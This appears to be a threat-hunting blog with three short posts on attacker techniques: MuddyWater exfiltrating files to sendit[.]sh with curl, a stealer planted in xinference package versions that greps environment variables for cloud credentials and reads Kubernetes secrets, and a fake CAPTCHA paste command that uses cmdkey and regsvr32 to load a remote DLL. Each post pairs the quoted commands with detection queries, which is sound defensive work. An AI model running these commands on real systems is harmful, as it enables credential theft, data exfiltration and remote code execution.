Know Your Adversary

Hello everyone! I really enjoy spotting various legitimate services that attackers abuse. Today we’ll look at another such example within the context of the Exfiltration to Cloud Storage technique (T1567.002) . According to this report, MuddyWater (Nebulous Werewolf, Seedworm, TEMP.Zagros, Static Kitten, Mercury, TA450, Cobalt Ulster, Earth Vetala, Mango Sandstorm, Boggy Serpens) abused the sendit[.]sh service for data exfiltration. The service allows uploading files up to 10 GB using the command line: curl.exe -F "file=@C:\Windows\Temp\<artifact>" hxxps://sendit[.]sh As with other similar services, you can look for suspicious communications with it - for example, outbound connections initiated by cURL: event_type: "dnsreqwin" AND dns_rname: "sendit.sh" AND proc_file_path: "curl.exe" See you soon!

Hello everyone! What do I know about stealers? They seem to be very noisy! And today, we’ll once again see that in action using TeamPCP (Haze Wolf) as an example. This time , the stealer was implanted by attackers into three versions of the xinference package (2.6.0, 2.6.1, and 2.6.2). Essentially, it collects SSH keys, various credentials, environment variables, crypto wallets, and much more, then uses cURL for exfiltration. Let’s take a look at a couple of techniques the attackers used to obtain credentials. For example, they were interested in data stored in environment variables: env | grep AWS_ env | grep -i google env | grep -i gcloud env | grep -i azure This looks fairly suspicious from a detection perspective: event_type: processcreate* AND proc_file_path: "env" AND cmdline: ("grep" AND ("aws_" OR "google" OR "azure" OR "gcloud")) Another technique was abusing kubectl to obtain credentials: kubectl get secrets --all-n...

Hello everyone! Today we’re going to look at another interesting variation of the Malicious Copy and Paste technique (T1204.004). This time, according to the report , the attackers prompted the victim to run the following command: C:\WINDOWS\system32\cmd.exe /c cmdkey /add:151.245.195[.]142 /user:guest && start regsvr32 /s \\151.245.195[.]142\hi\demo.dll & REM I am not a robot – Cloudflare ID: d7f5a3335794c434 As you can see, before registering a malicious library from a remote server using regsvr32.exe , the attackers use cmdkey.exe to store credentials for accessing that server. And yes, abusing cmdkey.exe can be a good hunting opportunity - we can look for suspicious events where credentials are added to the Windows Credential Manager: event_type: "processcreatewin" AND proc_file_path: "cmdkey.exe" AND cmdline: "add" See you soon!